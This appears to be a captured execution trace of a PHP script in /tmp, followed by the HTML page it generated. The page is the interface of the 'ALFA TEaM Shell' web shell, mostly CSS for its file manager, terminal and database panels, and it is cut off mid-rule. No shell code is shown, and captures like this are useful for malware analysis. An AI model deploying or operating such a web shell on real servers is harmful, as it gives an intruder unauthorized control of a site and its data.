5	494	0	0.059333	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	3	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	494	1	0.059348	436256
5	494	R			FALSE
5	495	0	0.059362	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	4	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	495	1	0.059377	436256
5	495	R			TRUE
5	496	0	0.059390	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	5	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	496	1	0.059405	436256
5	496	R			TRUE
5	497	0	0.059418	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	6	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	497	1	0.059433	436256
5	497	R			TRUE
5	498	0	0.059446	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	7	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	498	1	0.059460	436256
5	498	R			TRUE
5	499	0	0.059472	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	8	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	499	1	0.059486	436256
5	499	R			TRUE
5	500	0	0.059499	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	9	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	500	1	0.059514	436256
5	500	R			TRUE
5	501	0	0.059526	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	10	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	501	1	0.059541	436256
5	501	R			TRUE
4	491	1	0.059553	434736
4	502	0	0.059561	434736	alfafooter	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2563	0
5	503	0	0.059574	434736	htmlspecialchars	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2293	1	'/var/www/html/uploads/'
5	503	1	0.059589	434928
5	503	R			'/var/www/html/uploads/'
5	504	0	0.059606	437808	date	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2306	1	'Y'
5	504	1	0.059640	438096
5	504	R			'2023'
4	502	1	0.061327	451120
3	64	1	0.061338	451120
			0.061374	328488
TRACE END   [2023-02-13 02:16:26.377246]


Generated HTML code

<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
<link href="http://solevisible.com/images/alfamini.png" rel="icon" type="image/x-icon">
<title>..:: localhost ~ ALFA TEaM Shell - v4.1-Tesla ::..</title>
<style type="text/css">.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}

@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
#alfaloader{	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;width:100px;height:100px;}
#a_loader img{	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}
.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:#67ABDF;font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(http://solevisible.com/images/alfamini.png);background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:0px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url(http://solevisible.com/images/alfamini.png);background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(http://solevisible.com/images/btn.png);background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;}.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}.header{border: 7px solid #0E304A}#meunlist{border-color: #0E304A}#hidden_sh{background-color: #0E304A}.ajaxarea{border: 1px solid #0E304A}.foot{border-color: #0E304A}.header_vars{color: #27979B;}.header_values{color: #67ABDF;}.header_on{color: #00FF00;}.header_off{color: #ff0000;}.header_none{color: #00FF00;}.home_shell{color: #ff0000;}.home_shell:hover{color: #FFFFFF;}.back_shell{color: #efbe73;}.back_shell:hover{color: #FFFFFF;}.header_pwd{color: #00FF00;}.header_pwd:hover{color: #FFFFFF;}.header_drive{color: #00FF00;}.header_drive:hover{color: #FFFFFF;}.header_show_all{color: #00FF00;}.disable_functions{color: #ff0000;}.footer_text{color: #27979B;}.menu_options{color: #27979B;}.menu_options:hover{background-color: #646464;font-weight: unset;}.content_options_holder .header center a{color: #00FF00;}.content_options_holder .header center a:hover{color: #FFFFFF;}.txtfont_header{color: 